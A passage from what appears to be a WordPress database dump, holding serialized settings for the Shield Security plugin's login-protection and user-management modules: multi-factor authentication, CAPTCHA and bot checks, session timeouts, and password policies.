module\";}s:19:\"rename_wplogin_path\";a:12:{s:3:\"key\";s:19:\"rename_wplogin_path\";s:7:\"section\";s:22:\"section_rename_wplogin\";s:8:\"advanced\";b:1;s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/5q\";s:9:\"link_blog\";s:19:\"https://shsec.io/5r\";s:9:\"beacon_id\";i:316;s:4:\"name\";s:15:\"Hide Login Page\";s:7:\"summary\";s:31:\"Rename The WordPress Login Page\";s:11:\"description\";s:101:\"Creating a path here will disable your \'wp-login.php\'. Only letters and numbers are permitted: abc123\";}s:29:\"enable_chained_authentication\";a:10:{s:3:\"key\";s:29:\"enable_chained_authentication\";s:7:\"section\";s:34:\"section_multifactor_authentication\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/9r\";s:9:\"link_blog\";s:19:\"https://shsec.io/84\";s:9:\"beacon_id\";i:326;s:4:\"name\";s:27:\"Multi-Factor Authentication\";s:7:\"summary\";s:41:\"Require All Active Authentication Factors\";s:11:\"description\";s:123:\"When enabled, all multi-factor authentication methods will be applied to a user login. Disable to only require one to pass.\";}s:8:\"mfa_skip\";a:12:{s:3:\"key\";s:8:\"mfa_skip\";s:7:\"section\";s:34:\"section_multifactor_authentication\";s:7:\"premium\";b:1;s:7:\"default\";i:0;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:19:\"https://shsec.io/b1\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:141;s:4:\"name\";s:19:\"Multi-Factor Bypass\";s:7:\"summary\";s:78:\"A User Can Bypass Multi-Factor Authentication (MFA) For The Set Number Of Days\";s:11:\"description\";s:97:\"Enter the number of days a user can bypass future MFA after a successful MFA-login. 0 to disable.\";}s:17:\"allow_backupcodes\";a:11:{s:3:\"key\";s:17:\"allow_backupcodes\";s:7:\"section\";s:34:\"section_multifactor_authentication\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/dx\";s:9:\"link_blog\";s:19:\"https://shsec.io/dy\";s:9:\"beacon_id\";i:143;s:4:\"name\";s:18:\"Allow Backup Codes\";s:7:\"summary\";s:37:\"Allow Users To Generate A Backup Code\";s:11:\"description\";s:95:\"Allow users to generate a backup code that can be used to login if MFA factors are unavailable.\";}s:27:\"enable_google_authenticator\";a:10:{s:3:\"key\";s:27:\"enable_google_authenticator\";s:7:\"section\";s:14:\"section_2fa_ga\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:22:\"https://shsec.io/shld7\";s:9:\"link_blog\";s:22:\"https://shsec.io/shld6\";s:9:\"beacon_id\";i:245;s:4:\"name\";s:27:\"Enable Google Authenticator\";s:7:\"summary\";s:39:\"Allow Users To Use Google Authenticator\";s:11:\"description\";s:101:\"When enabled, users will have the option to add Google Authenticator to their WordPress user profile.\";}s:27:\"enable_email_authentication\";a:10:{s:3:\"key\";s:27:\"enable_email_authentication\";s:7:\"section\";s:17:\"section_2fa_email\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/3t\";s:9:\"link_blog\";s:19:\"https://shsec.io/9q\";s:9:\"beacon_id\";i:247;s:4:\"name\";s:27:\"Enable Email Authentication\";s:7:\"summary\";s:40:\"Two-Factor Login Authentication By Email\";s:11:\"description\";s:90:\"All users will be required to verify their login by email-based two-factor authentication.\";}s:26:\"two_factor_auth_user_roles\";a:12:{s:3:\"key\";s:26:\"two_factor_auth_user_roles\";s:7:\"section\";s:17:\"section_2fa_email\";s:8:\"advanced\";b:1;s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:4:{i:0;s:11:\"contributor\";i:1;s:6:\"author\";i:2;s:6:\"editor\";i:3;s:13:\"administrator\";}s:13:\"value_options\";a:10:{i:0;a:2:{s:9:\"value_key\";s:10:\"subscriber\";s:4:\"text\";s:11:\"Subscribers\";}i:1;a:2:{s:9:\"value_key\";s:11:\"contributor\";s:4:\"text\";s:12:\"Contributors\";}i:2;a:2:{s:9:\"value_key\";s:6:\"author\";s:4:\"text\";s:7:\"Authors\";}i:3;a:2:{s:9:\"value_key\";s:6:\"editor\";s:4:\"text\";s:7:\"Editors\";}i:4;a:2:{s:9:\"value_key\";s:13:\"administrator\";s:4:\"text\";s:14:\"Administrators\";}i:5;a:2:{s:9:\"value_key\";s:8:\"customer\";s:4:\"text\";s:14:\"[Woo] Customer\";}i:6;a:2:{s:9:\"value_key\";s:12:\"shop_manager\";s:4:\"text\";s:22:\"[Woo/EDD] Shop Manager\";}i:7;a:2:{s:9:\"value_key\";s:15:\"shop_accountant\";s:4:\"text\";s:21:\"[EDD] Shop Accountant\";}i:8;a:2:{s:9:\"value_key\";s:11:\"shop_worker\";s:4:\"text\";s:17:\"[EDD] Shop Worker\";}i:9;a:2:{s:9:\"value_key\";s:14:\"edd_subscriber\";s:4:\"text\";s:14:\"[EDD] Customer\";}}s:9:\"link_info\";s:19:\"https://shsec.io/4v\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:243;s:4:\"name\";s:30:\"Enforce - Email Authentication\";s:7:\"summary\";s:46:\"All User Roles Subject To Email Authentication\";s:11:\"description\";s:130:\"Enforces email-based authentication on all users with the selected roles. Note: This setting only applies to email authentication.\";}s:18:\"email_any_user_set\";a:11:{s:3:\"key\";s:18:\"email_any_user_set\";s:7:\"section\";s:17:\"section_2fa_email\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/gj\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:142;s:4:\"name\";s:14:\"Allow Any User\";s:7:\"summary\";s:60:\"Allow Any User To Turn-On Two-Factor Authentication By Email\";s:11:\"description\";s:61:\"Allow Any User To Turn-On Two-Factor Authentication By Email.\";}s:20:\"enable_antibot_check\";a:10:{s:3:\"key\";s:20:\"enable_antibot_check\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/k0\";s:9:\"link_blog\";s:19:\"https://shsec.io/jo\";s:9:\"beacon_id\";i:426;s:4:\"name\";s:7:\"AntiBot\";s:7:\"summary\";s:41:\"Use Experimental AntiBot Detection Engine\";s:11:\"description\";s:76:\"Use Shield\'s AntiBot Detection Engine In-Place of GASP/CAPTCHA Bot checking.\";}s:24:\"bot_protection_locations\";a:11:{s:3:\"key\";s:24:\"bot_protection_locations\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:1:{i:0;s:5:\"login\";}s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:5:\"login\";s:4:\"text\";s:5:\"Login\";}i:1;a:2:{s:9:\"value_key\";s:8:\"register\";s:4:\"text\";s:8:\"Register\";}i:2;a:2:{s:9:\"value_key\";s:8:\"password\";s:4:\"text\";s:13:\"Lost Password\";}i:3;a:2:{s:9:\"value_key\";s:12:\"checkout_woo\";s:4:\"text\";s:22:\"Checkout (WooCommerce)\";}}s:9:\"link_info\";s:19:\"https://shsec.io/dv\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:314;s:4:\"name\";s:20:\"Protection Locations\";s:7:\"summary\";s:38:\"How Google reCAPTCHA Will Be Displayed\";s:11:\"description\";s:64:\"Choose for which forms bot protection measures will be deployed.\";}s:20:\"login_limit_interval\";a:11:{s:3:\"key\";s:20:\"login_limit_interval\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:7:\"default\";s:1:\"5\";s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:19:\"https://shsec.io/3q\";s:9:\"link_blog\";s:19:\"https://shsec.io/9o\";s:9:\"beacon_id\";i:242;s:4:\"name\";s:23:\"Login Cooldown Interval\";s:7:\"summary\";s:39:\"Limit login attempts to every X seconds\";s:11:\"description\";s:109:\"WordPress will process only ONE login attempt for every number of seconds specified. Zero (0) turns this off.\";}s:23:\"enable_login_gasp_check\";a:10:{s:3:\"key\";s:23:\"enable_login_gasp_check\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/3r\";s:9:\"link_blog\";s:19:\"https://shsec.io/9n\";s:9:\"beacon_id\";i:313;s:4:\"name\";s:14:\"Bot Protection\";s:7:\"summary\";s:54:\"Protect WP Login From Automated Login Attempts By Bots\";s:11:\"description\";s:138:\"Adds a dynamically (Javascript) generated checkbox to the login form that prevents bots using automated login techniques. Recommended: ON.\";}s:29:\"enable_google_recaptcha_login\";a:11:{s:3:\"key\";s:29:\"enable_google_recaptcha_login\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:7:\"default\";s:8:\"disabled\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:7:\"default\";s:4:\"text\";s:13:\"Default Style\";}i:2;a:2:{s:9:\"value_key\";s:5:\"light\";s:4:\"text\";s:11:\"Light Theme\";}i:3;a:2:{s:9:\"value_key\";s:4:\"dark\";s:4:\"text\";s:10:\"Dark Theme\";}i:4;a:2:{s:9:\"value_key\";s:9:\"invisible\";s:4:\"text\";s:9:\"Invisible\";}}s:9:\"link_info\";s:19:\"https://shsec.io/9m\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:269;s:4:\"name\";s:7:\"CAPTCHA\";s:7:\"summary\";s:14:\"Enable CAPTCHA\";s:11:\"description\";s:32:\"Use CAPTCHA on the login screen.\";}s:16:\"antibot_form_ids\";a:12:{s:3:\"key\";s:16:\"antibot_form_ids\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:8:\"advanced\";b:1;s:7:\"premium\";b:1;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}s:9:\"link_info\";s:19:\"https://shsec.io/hg\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:144;s:4:\"name\";s:13:\"AntiBot Forms\";s:7:\"summary\";s:66:\"Enter The IDs Of The 3rd Party Login Forms For Use With AntiBot JS\";s:11:\"description\";s:32:\"For Use With AnitBot JS (above).\";}s:10:\"enable_u2f\";a:10:{s:3:\"key\";s:10:\"enable_u2f\";s:7:\"section\";s:31:\"section_hardware_authentication\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/i9\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:9:\"Allow U2F\";s:7:\"summary\";s:33:\"Allow Registration Of U2F Devices\";s:11:\"description\";s:34:\"Allow Registration Of U2F Devices.\";}s:14:\"enable_yubikey\";a:10:{s:3:\"key\";s:14:\"enable_yubikey\";s:7:\"section\";s:31:\"section_hardware_authentication\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/4f\";s:9:\"link_blog\";s:19:\"https://shsec.io/9t\";s:9:\"beacon_id\";i:358;s:4:\"name\";s:17:\"Allow Yubikey OTP\";s:7:\"summary\";s:49:\"Allow Yubikey Registration For One Time Passwords\";s:11:\"description\";s:99:\"Combined with your Yubikey API Key (below) this will form the basis of your Yubikey Authentication.\";}s:14:\"yubikey_app_id\";a:11:{s:3:\"key\";s:14:\"yubikey_app_id\";s:7:\"section\";s:31:\"section_hardware_authentication\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/4g\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:360;s:4:\"name\";s:14:\"Yubikey App ID\";s:7:\"summary\";s:26:\"Your Unique Yubikey App ID\";s:11:\"description\";s:91:\"Combined with your Yubikey API Key this will form the basis of your Yubikey Authentication.\";}s:15:\"yubikey_api_key\";a:11:{s:3:\"key\";s:15:\"yubikey_api_key\";s:7:\"section\";s:31:\"section_hardware_authentication\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/4g\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:360;s:4:\"name\";s:15:\"Yubikey API Key\";s:7:\"summary\";s:31:\"Your Unique Yubikey App API Key\";s:11:\"description\";s:90:\"Combined with your Yubikey App ID this will form the basis of your Yubikey Authentication.\";}s:13:\"text_imahuman\";a:11:{s:3:\"key\";s:13:\"text_imahuman\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/dz\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:18:\"GASP Checkbox Text\";s:7:\"summary\";s:47:\"The Message Displayed Next To The GASP Checkbox\";s:11:\"description\";s:99:\"You can change the text displayed to the user beside the checkbox if you need a customized message.\";}s:19:\"text_pleasecheckbox\";a:11:{s:3:\"key\";s:19:\"text_pleasecheckbox\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/dz\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"GASP Alert Text\";s:7:\"summary\";s:55:\"The Message Displayed If The User Doesn\'t Check The Box\";s:11:\"description\";s:95:\"You can change the text displayed to the user in the alert message if they don\'t check the box.\";}s:26:\"email_can_send_verified_at\";a:6:{s:3:\"key\";s:26:\"email_can_send_verified_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;s:3:\"min\";i:0;}s:8:\"gasp_key\";a:6:{s:3:\"key\";s:8:\"gasp_key\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}s:21:\"use_login_intent_page\";a:5:{s:3:\"key\";s:21:\"use_login_intent_page\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"boolean\";s:5:\"value\";b:1;}}s:11:\"definitions\";a:2:{s:20:\"login_intent_timeout\";i:5;s:6:\"events\";a:8:{s:18:\"2fa_verify_success\";a:2:{s:12:\"audit_params\";a:2:{i:0;s:10:\"user_login\";i:1;s:6:\"method\";}s:5:\"level\";s:6:\"notice\";}s:15:\"2fa_verify_fail\";a:3:{s:12:\"audit_params\";a:2:{i:0;s:10:\"user_login\";i:1;s:6:\"method\";}s:5:\"level\";s:7:\"warning\";s:7:\"offense\";b:1;}s:13:\"cooldown_fail\";a:1:{s:5:\"level\";s:7:\"warning\";}s:13:\"honeypot_fail\";a:2:{s:12:\"audit_params\";a:2:{i:0;s:10:\"user_login\";i:1;s:6:\"action\";}s:5:\"level\";s:7:\"warning\";}s:11:\"botbox_fail\";a:2:{s:12:\"audit_params\";a:2:{i:0;s:10:\"user_login\";i:1;s:6:\"action\";}s:5:\"level\";s:7:\"warning\";}s:11:\"login_block\";a:3:{s:5:\"level\";s:7:\"warning\";s:6:\"recent\";b:1;s:7:\"offense\";b:1;}s:14:\"hide_login_url\";a:1:{s:5:\"level\";s:6:\"notice\";}s:11:\"2fa_success\";a:2:{s:5:\"level\";s:4:\"info\";s:6:\"recent\";b:1;}}}s:4:\"meta\";a:1:{s:6:\"ts_mod\";i:1632315670;}}','no'),(510348,'_site_transient_timeout_shield_mod_config_user_management','1632920474','no'),(510349,'_site_transient_shield_mod_config_user_management','a:6:{s:4:\"slug\";s:15:\"user_management\";s:10:\"properties\";a:14:{s:4:\"slug\";s:15:\"user_management\";s:4:\"name\";s:15:\"User Management\";s:12:\"sidebar_name\";s:5:\"Users\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:15:\"user_management\";s:7:\"tagline\";s:61:\"Control user sessions, duration, timeouts and account sharing\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:40;}s:8:\"sections\";a:7:{i:0;a:6:{s:4:\"slug\";s:31:\"section_user_session_management\";s:7:\"primary\";b:1;s:5:\"title\";s:23:\"User Session Management\";s:11:\"title_short\";s:15:\"Session Options\";s:9:\"beacon_id\";i:397;s:7:\"summary\";a:2:{i:0;s:119:\"Purpose - Allows you to better control user sessions on your site and expire idle sessions and prevent account sharing.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:1;a:5:{s:4:\"slug\";s:16:\"section_user_reg\";s:5:\"title\";s:17:\"User Registration\";s:11:\"title_short\";s:17:\"User Registration\";s:9:\"beacon_id\";i:145;s:7:\"summary\";a:2:{i:0;s:53:\"Purpose - Control user registration and prevent SPAM.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:2;a:6:{s:4:\"slug\";s:17:\"section_passwords\";s:4:\"reqs\";a:1:{s:6:\"wp_min\";s:3:\"4.4\";}s:5:\"title\";s:17:\"Password Policies\";s:11:\"title_short\";s:17:\"Password Policies\";s:9:\"beacon_id\";i:256;s:7:\"summary\";a:2:{i:0;s:69:\"Purpose - Have full control over passwords used by users on the site.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:3;a:5:{s:4:\"slug\";s:15:\"section_suspend\";s:5:\"title\";s:36:\"Automatic And Manual User Suspension\";s:11:\"title_short\";s:15:\"User Suspension\";s:9:\"beacon_id\";i:273;s:7:\"summary\";a:2:{i:0;s:75:\"Purpose - Automatically suspend accounts to prevent login by certain users.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:4;a:5:{s:4:\"slug\";s:32:\"section_admin_login_notification\";s:5:\"title\";s:24:\"Admin Login Notification\";s:11:\"title_short\";s:13:\"Notifications\";s:9:\"beacon_id\";i:147;s:7:\"summary\";a:2:{i:0;s:125:\"Purpose - So you can be made aware of when a WordPress administrator has logged into your site when you are not expecting it.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:5;a:5:{s:4:\"slug\";s:54:\"section_enable_plugin_feature_user_accounts_management\";s:5:\"title\";s:30:\"Enable Module: User Management\";s:11:\"title_short\";s:14:\"Disable Module\";s:9:\"beacon_id\";i:273;s:7:\"summary\";a:2:{i:0;s:148:\"Purpose - User Management offers real user sessions, finer control over user session time-out, and ensures users have logged-in in a correct manner.\";i:1;s:60:\"Recommendation - Keep the User Management feature turned on.\";}}i:6;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:21:{s:22:\"enable_user_management\";a:11:{s:3:\"key\";s:22:\"enable_user_management\";s:7:\"section\";s:54:\"section_enable_plugin_feature_user_accounts_management\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/e3\";s:9:\"link_blog\";s:19:\"https://shsec.io/hi\";s:9:\"beacon_id\";i:273;s:4:\"name\";s:22:\"Enable User Management\";s:7:\"summary\";s:46:\"Enable (or Disable) The User Management module\";s:11:\"description\";s:74:\"Un-Checking this option will completely disable the User Management module\";}s:36:\"enable_user_login_email_notification\";a:12:{s:3:\"key\";s:36:\"enable_user_login_email_notification\";s:7:\"section\";s:32:\"section_admin_login_notification\";s:7:\"premium\";b:1;s:9:\"sensitive\";b:0;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/e2\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:147;s:4:\"name\";s:29:\"User Login Notification Email\";s:7:\"summary\";s:58:\"Send Email Notification To Each User Upon Successful Login\";s:11:\"description\";s:85:\"A notification is sent to each user when a successful login occurs for their account.\";}s:37:\"enable_admin_login_email_notification\";a:10:{s:3:\"key\";s:37:\"enable_admin_login_email_notification\";s:7:\"section\";s:32:\"section_admin_login_notification\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:30:\"Admin Login Notification Email\";s:7:\"summary\";s:53:\"Send An Notification Email When Administrator Logs In\";s:11:\"description\";s:168:\"If you would like to be notified every time an administrator user logs into this WordPress site, enter a notification email address. No email address - No Notification.\";}s:24:\"session_timeout_interval\";a:10:{s:3:\"key\";s:24:\"session_timeout_interval\";s:7:\"section\";s:31:\"section_user_session_management\";s:7:\"default\";i:2;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Session Timeout\";s:7:\"summary\";s:65:\"Specify How Many Days After Login To Automatically Force Re-Login\";s:11:\"description\";s:75:\"WordPress default is 2 days, or 14 days if you check the \'Remember Me\' box.\";}s:29:\"session_idle_timeout_interval\";a:11:{s:3:\"key\";s:29:\"session_idle_timeout_interval\";s:7:\"section\";s:31:\"section_user_session_management\";s:7:\"default\";i:48;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:75:\"https://support.getshieldsecurity.com/support/solutions/articles/3000070590\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:397;s:4:\"name\";s:12:\"Idle Timeout\";s:7:\"summary\";s:68:\"Specify How Many Hours After Inactivity To Automatically Logout User\";s:11:\"description\";s:157:\"If the user is inactive for the number of hours specified, they will be forcefully logged out next time they return. Set this to \'0\' to turn off this option.\";}s:21:\"session_lock_location\";a:10:{s:3:\"key\";s:21:\"session_lock_location\";s:7:\"section\";s:31:\"section_user_session_management\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Lock To Location\";s:7:\"summary\";s:34:\"Locks A User Session To IP address\";s:11:\"description\";s:211:\"When selected, a session is restricted to the same IP address as when the user logged in. If a logged-in user\'s IP address changes, the session will be invalidated and they\'ll be forced to re-login to WordPress.\";}s:33:\"session_username_concurrent_limit\";a:10:{s:3:\"key\";s:33:\"session_username_concurrent_limit\";s:7:\"section\";s:31:\"section_user_session_management\";s:7:\"default\";i:0;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:25:\"Max Simultaneous Sessions\";s:7:\"summary\";s:49:\"Limit Simultaneous Sessions For The Same Username\";s:11:\"description\";s:137:\"The number provided here is the maximum number of simultaneous, distinct, sessions allowed for any given username. Use \'0\' for no limits.\";}s:18:\"reg_email_validate\";a:11:{s:3:\"key\";s:18:\"reg_email_validate\";s:7:\"section\";s:16:\"section_user_reg\";s:7:\"premium\";b:1;s:4:\"type\";s:6:\"select\";s:7:\"default\";s:3:\"log\";s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:8:\"Log Only\";}i:2;a:2:{s:9:\"value_key\";s:7:\"offense\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:24:\"Immediate Block and Kill\";}}s:9:\"link_info\";s:19:\"https://shsec.io/gk\";s:9:\"link_blog\";s:19:\"https://shsec.io/hh\";s:4:\"name\";s:24:\"Validate Email Addresses\";s:7:\"summary\";s:55:\"Validate Email Addresses When User Attempts To Register\";s:11:\"description\";s:56:\"Validate Email Addresses When User Attempts To Register.\";}s:12:\"email_checks\";a:10:{s:3:\"key\";s:12:\"email_checks\";s:7:\"section\";s:16:\"section_user_reg\";s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:2:{i:0;s:6:\"syntax\";i:1;s:6:\"domain\";}s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:6:\"syntax\";s:4:\"text\";s:20:\"Email Address Syntax\";}i:1;a:2:{s:9:\"value_key\";s:17:\"domain_registered\";s:4:\"text\";s:20:\"Domain Is Registered\";}i:2;a:2:{s:9:\"value_key\";s:15:\"domain_resolves\";s:4:\"text\";s:20:\"Domain Resolve To IP\";}i:3;a:2:{s:9:\"value_key\";s:2:\"mx\";s:4:\"text\";s:9:\"Domain MX\";}i:4;a:2:{s:9:\"value_key\";s:13:\"nondisposable\";s:4:\"text\";s:24:\"Disposable Email Service\";}}s:9:\"link_info\";s:19:\"https://shsec.io/gk\";s:9:\"link_blog\";s:19:\"https://shsec.io/hh\";s:4:\"name\";s:12:\"Email Checks\";s:7:\"summary\";s:48:\"The Email Address Properties That Will Be Tested\";s:11:\"description\";s:14:\"Select which .\";}s:24:\"enable_password_policies\";a:10:{s:3:\"key\";s:24:\"enable_password_policies\";s:7:\"section\";s:17:\"section_passwords\";s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"N\";s:9:\"link_info\";s:19:\"https://shsec.io/e1\";s:9:\"link_blog\";s:19:\"https://shsec.io/c4\";s:9:\"beacon_id\";i:146;s:4:\"name\";s:24:\"Enable Password Policies\";s:7:\"summary\";s:34:\"Enable The Password Policies Below\";s:11:\"description\";s:34:\"Turn on/off all password policies.\";}s:18:\"pass_prevent_pwned\";a:9:{s:3:\"key\";s:18:\"pass_prevent_pwned\";s:7:\"section\";s:17:\"section_passwords\";s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"Y\";s:9:\"link_info\";s:19:\"https://shsec.io/by\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:23:\"Prevent Pwned Passwords\";s:7:\"summary\";s:30:\"Prevent Use Of Pwned Passwords\";s:11:\"description\";s:94:\"Prevents users from using any passwords found on the public available list of pwned passwords.\";}s:15:\"pass_min_length\";a:10:{s:3:\"key\";s:15:\"pass_min_length\";s:7:\"section\";s:17:\"section_passwords\";s:7:\"premium\";b:1;s:4:\"type\";s:7:\"integer\";s:7:\"default\";s:2:\"12\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Minimum Length\";s:7:\"summary\";s:23:\"Minimum Password Length\";s:11:\"description\";s:79:\"All passwords that a user sets must be at least this many characters in length.\";}s:17:\"pass_min_strength\";a:11:{s:3:\"key\";s:17:\"pass_min_strength\";s:7:\"section\";s:17:\"section_passwords\";s:7:\"premium\";b:1;s:4:\"type\";s:6:\"select\";s:7:\"default\";s:1:\"4\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:1:\"0\";s:4:\"text\";s:9:\"Very Weak\";}i:1;a:2:{s:9:\"value_key\";s:1:\"1\";s:4:\"text\";s:4:\"Weak\";}i:2;a:2:{s:9:\"value_key\";s:1:\"2\";s:4:\"text\";s:6:\"Medium\";}i:3;a:2:{s:9:\"value_key\";s:1:\"3\";s:4:\"text\";s:6:\"Strong\";}i:4;a:2:{s:9:\"value_key\";s:1:\"4\";s:4:\"text\";s:11:\"Very Strong\";}}s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Minimum Strength\";s:7:\"summary\";s:25:\"Minimum Password Strength\";s:11:\"description\";s:63:\"All passwords that a user sets must meet this minimum strength.\";}s:19:\"pass_force_existing\";a:10:{s:3:\"key\";s:19:\"pass_force_existing\";s:7:\"section\";s:17:\"section_passwords\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"N\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:23:\"Apply To Existing Users\";s:7:\"summary\";s:61:\"Apply Password Policies To Existing Users and Their Passwords\";s:11:\"description\";s:104:\"Forces existing users to update their passwords if they don\'t meet requirements, after they next login .\";}s:11:\"pass_expire\";a:11:{s:3:\"key\";s:11:\"pass_expire\";s:7:\"section\";s:17:\"section_passwords\";s:7:\"premium\";b:1;s:4:\"type\";s:7:\"integer\";s:7:\"default\";s:2:\"60\";s:3:\"min\";i:0;s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:19:\"Password Expiration\";s:7:\"summary\";s:37:\"Passwords Expire After This Many Days\";s:11:\"description\";s:81:\"Users will be forced to reset their passwords after the number of days 